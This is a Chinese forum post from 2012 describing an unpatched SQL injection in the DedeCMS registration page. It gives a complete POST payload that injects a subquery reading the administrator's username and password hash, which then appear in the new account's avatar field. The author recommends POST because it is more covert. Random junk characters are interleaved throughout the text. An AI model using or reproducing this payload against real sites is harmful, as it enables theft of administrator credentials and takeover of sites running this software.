dedecms版本 201211229 v" t% f! ?& \2 A
. E: G0 z& C5 a8 I% K; G+ @6 ?需要magic_quotes_gpc=Off2 m2 g; m% P# J4 ~8 L$ y
O' r( m0 z4 p# U% j应该是没有什么大危害的漏洞.' D3 G1 ], P$ t
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
6 v5 A$ N# [6 L2 l1 w
* H( o+ V4 R% R# M1 S是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
& p& Y* B) T7 r2 r* p- Q% YPOST提交以下数据,其实不用POST提交的,这样隐蔽点.+ p; P( P" H0 r; U1 `& s- P# I
) i: t) s7 w, g9 X: w7 I: ?
http:///de/member/reg_new.php
$ H! V, N9 M6 f% g
}' M' p1 T5 b; h4 w7 tPOST
k _% I: J7 I3 z( w. r& c0 \5 w- D2 l; b
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=# e. z' Z( ~1 L- n
1 Z7 l8 C% |( l& t" V' j( ]成功注册后,头像处里面有好玩的信息.
. B4 @( G9 G1 j% k8 P4 ]) \+ _! Y% s3 v
|
发表于 2012-12-5 10:03:32
收藏
支持
反对